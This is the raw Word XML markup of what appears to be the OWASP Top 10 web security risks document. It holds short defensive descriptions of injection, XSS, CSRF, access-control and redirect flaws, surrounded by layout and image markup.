        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="389" w:firstLine="240"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3260972C" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="377" w:lineRule="exact"/>
        <w:ind w:left="389" w:firstLine="48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A10 – Unvalidated</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E94457B" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="exact"/>
        <w:ind w:left="389" w:firstLine="286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Redirects and</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593A58FF" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="259" w:lineRule="exact"/>
        <w:ind w:left="389" w:firstLine="497"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:b/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="98"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Forwards</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E751C42" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="389" w:firstLine="497"/>
      </w:pPr>
      <w:r w:rsidRPr="00B3349A">
        <w:br w:type="column"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC9DFD9" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
        <w:ind w:left="389" w:firstLine="497"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="249D79CD" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="353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pplication functions related to authentication and session management are often not</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48566B83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implemented correctly, allowing attackers to compromise passwords, keys, or session tokens, or</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="366769B7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o exploit other implementation flaws to assume other users’ identities.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="384F6540" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58EC24EF" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7651D91C" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="352" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="94"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>XSS flaws occur whenever an application takes untrusted data and sends it to a web browser</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0303C7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without proper validation or escaping. XSS allows attackers to execute scripts in the victim’s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37B4C5D5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2"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>browser which can hijack user sessions, deface web sites, or redirect the user to malicious sites.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D163C5F" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4916C0A2" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="08E8E291" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="352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 direct object reference occurs when a developer exposes a reference to an internal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694894BD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86"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>implementation object, such as a file, directory, or database key. Without an access control check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="207EFC1E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or other protection, attackers can manipulate these references to access unauthorized data.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="429ABC20" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="452FFE6D" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5D407D87" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="245" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="95"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Good security requires having a secure configuration defined and deployed for the application,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E1C8D65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frameworks, application server, web server, database server, and platform. Secure settings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78691E00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5"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>should be defined, implemented, and maintained, as defaults are often insecure. Additionally,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73B0DCAF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oftware should be kept up to date.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="630F1AFC" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="558B27A9" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="377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Many web applications do not properly protect sensitive data, such as credit cards, tax IDs, and</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="567D70BC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2"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>authentication credentials. Attackers may steal or modify such weakly protected data to conduct</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="255ABD2E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2"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>credit card fraud, identity theft, or other crimes. Sensitive data deserves extra protection such as</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2518623B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2"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>encryption at rest or in transit, as well as special precautions when exchanged with the browser.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337D4714" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="681C9557" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="377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Most web applications verify function level access rights before making that functionality visible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B9A2AF6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in the UI. However, applications need to perform the same access control checks on the server</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="546ED89D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when each function is accessed. If requests are not verified, attackers will be able to forge</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B78D02F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requests in order to access functionality without proper authorization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D76A0D" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="770C396E" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="377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A CSRF attack forces a logged-on victim’s browser to send a forged HTTP request, including the</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B042075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victim’s session cookie and any other automatically included authentication information, to a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585DE6C5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5"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>vulnerable web application. This allows the attacker to force the victim’s browser to generate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256AEB3C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requests the vulnerable application thinks are legitimate requests from the victim.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11CF2435" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="52ACBCB3" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="377" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="92"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Components, such as libraries, frameworks, and other software modules, almost always run with</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47D008C0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full privileges. If  a vulnerable component is exploited, such an attack can facilitate serious data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12EC92E8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loss or server takeover. Applications using components with known vulnerabilities may</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18CC8A00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undermine application defenses and enable a range of possible attacks and impacts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D6F2EB" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4632282B" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D3BCAC6" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00810992" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="245" w:lineRule="exact"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:w w:val="95"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Web applications frequently redirect and forward users to other pages and websites, and use</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49DEB68A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untrusted data to determine the destination pages. Without proper validation, attackers can</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="000DB736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redirect victims to phishing or malware sites, or use forwards to access unauthorized pages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293A3563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666" w:space="0"/>
            <w:col w:w="8134" w:space="0"/>
          </w:cols>
          <w:docGrid w:type="lines" w:linePitch="312"/>
        </w:sectPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="391ED53B" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00F13059" w:rsidP="00F13059">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
      </w:pPr>
      <w:bookmarkStart w:id="7" w:name="7"/>
      <w:bookmarkEnd w:id="7"/>
    </w:p>
    <w:p w14:paraId="6EE71DBC" w14:textId="77777777" w:rsidR="00F13059" w:rsidRDefault="00164FC4" w:rsidP="00F13059">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="2304"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="970" w:lineRule="exact"/>
        <w:ind w:left="486"/>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="76EB711A">
          <v:shape id="_x0000_s2780" type="#_x0000_t202" style="position:absolute;left:0;text-align:left;margin-left:-1pt;margin-top:74.35pt;width:570pt;height:229.15pt;z-index:251644416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67BDD564" w14:textId="77777777" w:rsidTr="00F13059">
                    <w:trPr>
                      <w:trHeight w:hRule="exact" w:val="1012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2B7DD1CB" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="774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14E612AB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5966ED41" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="497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5CA8CD39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52D5F227" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="508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74B791F7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41679BBA" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="549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3ECE1718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358DC79" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="496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030EBEE4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329C8CCE" w14:textId="77777777" w:rsidTr="00F13059">
                    <w:trPr>
                      <w:trHeight w:hRule="exact" w:val="62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8B04FBE" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="429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1EF02AE1" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="309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7EA9C124" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
                          <w:ind w:left="6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51638640" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="309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72222EF9" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
                          <w:ind w:left="47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COMM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2470EB9D" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="309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1B0BA1E8" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
                          <w:ind w:left="5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284EF9C7" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="309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78D11F7B" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="240" w:lineRule="exact"/>
                          <w:ind w:left="5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SEVER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9B1A9DF" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="309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7FCE90F9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492348DB" w14:textId="77777777" w:rsidTr="00F13059">
                    <w:trPr>
                      <w:trHeight w:hRule="exact" w:val="2347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AD2877D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Consider anyone</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="39A4994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who can send</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="7A9934F2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untrusted data to</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="6291274A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the system,</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="759D39F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cluding external</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="2BC6A5A2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users, internal</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="7ECD021A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users, and</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="19D69FE0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administrator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9C014BD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Attacker sends</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="38E871A0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simple text-based</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="485BCE3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attacks that exploit</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="050395BD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the syntax of the</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="7594212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targeted</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="4EC845BB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terpreter. Almost</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="74280740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any source of data</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="3EAB06CE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can be an injection</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="4230DDAF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vector, including</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="67B55C09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ternal sources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398C0D4" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00164FC4" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="273" w:lineRule="exact"/>
                          <w:ind w:left="73"/>
                        </w:pPr>
                        <w:hyperlink r:id="rId89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A6331"/>
                              <w:w w:val="98"/>
                              <w:sz w:val="19"/>
                              <w:u w:val="none"/>
                            </w:rPr>
                            <w:t>Injection</w:t>
                          </w:r>
                        </w:hyperlink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hyperlink r:id="rId90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A6331"/>
                              <w:w w:val="98"/>
                              <w:sz w:val="19"/>
                              <w:u w:val="none"/>
                            </w:rPr>
                            <w:t>flaws</w:t>
                          </w:r>
                        </w:hyperlink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occur when an application</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="062A4CA7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sends untrusted data to an interpreter.</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="1FCB48A9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jection flaws are very prevalent,</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="54AF3264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particularly in legacy code.  They are often</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="602D0C9B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found in SQL, LDAP, Xpath, or NoSQL</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="3B496DD3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queries; OS commands; XML parsers,</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="0B07177D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SMTP Headers, program arguments, etc.</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="2A1CD61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jection flaws are easy to discover when</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="2F4E660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examining code, but frequently hard to</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="6DAE1348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discover via testing. Scanners and fuzzers</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="4A26961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can help attackers find injection flaw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558973E" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="273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jection can result</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="72AF09C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 data loss or</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="4016F27B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corruption, lack of</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="4B6134C5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accountability, or</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="6B324C7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denial of access.</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="03AC8ECF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jection can</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="0DEF4E61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sometimes lead to</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="309E950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complete host</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="4EC86425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takeover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8B6AC2A" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="273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Consider the</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="12F7C777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business value of</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="46ABCB9D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the affected data</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="47AF2665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and the platform</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="2560BACC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running the</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="0AEAF03D" w14:textId="77777777" w:rsidR="00C534F5" w:rsidRDefault="00C534F5" w:rsidP="00F13059">
                        <w:pPr>
                          <w:spacing w:after="0" w:line="200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interpreter. All data</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="720F1C9D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could be stolen,</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="48C9A5AD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modified, or</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="7AE5B463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deleted.  Could your</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="5946324C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reputation be</w:t>
                        </w:r>
                      </w:p>
                      <w:p w14:paraId="75048305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harmed?</w:t>
                        </w:r>
                      </w:p>
                    </w:tc>
                  </w:tr>
                </w:tbl>
                <w:p w14:paraId="69AEE514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415EFA97">
          <v:shape id="imagerId91" o:spid="_x0000_s2779" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:122pt;height:96pt;z-index:-251992576;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId91" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="73C04E57">
          <v:shape id="imagerId92" o:spid="_x0000_s2778" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:98pt;margin-top:83pt;width:76pt;height:37pt;z-index:-251991552;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId92" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="338A577E">
          <v:shape id="imagerId93" o:spid="_x0000_s2777" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:101pt;margin-top:84pt;width:57pt;height:38pt;z-index:-251990528;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId93" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="5D4B483A">
          <v:shape id="imagerId94" o:spid="_x0000_s2776" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:222pt;margin-top:83pt;width:90pt;height:39pt;z-index:-251985408;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId94" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="2C1EAF8A">
          <v:shape id="imagerId95" o:spid="_x0000_s2775" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:224pt;margin-top:85pt;width:80pt;height:38pt;z-index:-251984384;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId95" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="30410C23">
          <v:shape id="imagerId96" o:spid="_x0000_s2774" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:373pt;margin-top:81pt;width:64pt;height:43pt;z-index:-251989504;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId96" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="4A7B6DBC">
          <v:shape id="imagerId97" o:spid="_x0000_s2773" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:375pt;margin-top:87pt;width:59pt;height:38pt;z-index:-251988480;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId97" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="7C2DA906">
          <v:shape id="imagerId98" o:spid="_x0000_s2772" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:462pt;margin-top:83pt;width:69pt;height:39pt;z-index:-251987456;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId98" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="7EBA4250">
          <v:shape id="imagerId99" o:spid="_x0000_s2771" type="#_x0000_t75" style="position:absolute;left:0;text-align:left;margin-left:470pt;margin-top:84pt;width:54pt;height:38pt;z-index:-251986432;mso-position-horizontal-relative:page;mso-position-vertical-relative:page">
            <v:imagedata r:id="rId99" o:title=""/>
            <w10:wrap anchorx="page" anchory="page"/>
          </v:shape>
        </w:pict>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:pict w14:anchorId="4A8EF012">
          <v:shapetype id="_x0000_m2770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89CC9DD">
          <v:shape id="_x0000_s2769" type="#_x0000_m2770" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:0;width:540pt;height:10in;z-index:-25201100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61F90FA1">
          <v:shapetype id="polygon16" o:spid="_x0000_m2768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AD9865B">
          <v:shape id="WS_polygon16" o:spid="_x0000_s2767" type="#polygon16" style="position:absolute;left:0;text-align:left;margin-left:-1.5pt;margin-top:124.5pt;width:543pt;height:3pt;z-index:25118156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760415FD">
          <v:shapetype id="polygon17" o:spid="_x0000_m2766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5CC8F50">
          <v:shape id="WS_polygon17" o:spid="_x0000_s2765" type="#polygon17" style="position:absolute;left:0;text-align:left;margin-left:-1.5pt;margin-top:155.7pt;width:543pt;height:3pt;z-index:25118259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63A2A20A">
          <v:shapetype id="polygon19" o:spid="_x0000_m2764" coordsize="600,2051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2F3963">
          <v:shape id="WS_polygon19" o:spid="_x0000_s2763" type="#polygon19" style="position:absolute;left:0;text-align:left;margin-left:538.5pt;margin-top:72.35pt;width:6pt;height:205.15pt;z-index:25118361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BB9906A">
          <v:shapetype id="polygon20" o:spid="_x0000_m2762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8E5F950">
          <v:shape id="WS_polygon20" o:spid="_x0000_s2761" type="#polygon20" style="position:absolute;left:0;text-align:left;margin-left:-1.5pt;margin-top:73.85pt;width:543pt;height:3pt;z-index:25118464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99A64DB">
          <v:shapetype id="polygon21" o:spid="_x0000_m2760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31BE387">
          <v:shape id="WS_polygon21" o:spid="_x0000_s2759" type="#polygon21" style="position:absolute;left:0;text-align:left;margin-left:-1.5pt;margin-top:273.05pt;width:543pt;height:3pt;z-index:25118566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5FF46DD6">
          <v:shapetype id="_x0000_m2758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F2682A3">
          <v:shape id="_x0000_s2757" type="#_x0000_m2758" style="position:absolute;left:0;text-align:left;margin-left:.55pt;margin-top:7in;width:266.4pt;height:215pt;z-index:-25200998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436E742B">
          <v:shapetype id="polygon186" o:spid="_x0000_m2756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F6B5E00">
          <v:shape id="WS_polygon186" o:spid="_x0000_s2755" type="#polygon186" style="position:absolute;left:0;text-align:left;margin-left:0;margin-top:282pt;width:266.4pt;height:3in;z-index:-25200896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50211AC">
          <v:shapetype id="_x0000_m2754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B6CCE13">
          <v:shape id="_x0000_s2753" type="#_x0000_m2754" style="position:absolute;left:0;text-align:left;margin-left:-1pt;margin-top:281pt;width:268.4pt;height:218pt;z-index:-252007936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282A7988">
          <v:shapetype id="polygon215" o:spid="_x0000_m2752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0852CF4">
          <v:shape id="WS_polygon215" o:spid="_x0000_s2751" type="#polygon215" style="position:absolute;left:0;text-align:left;margin-left:273.6pt;margin-top:7in;width:266.4pt;height:215pt;z-index:-25200691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101A3841">
          <v:shapetype id="polygon225" o:spid="_x0000_m2750" coordsize="1846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8ECBE26">
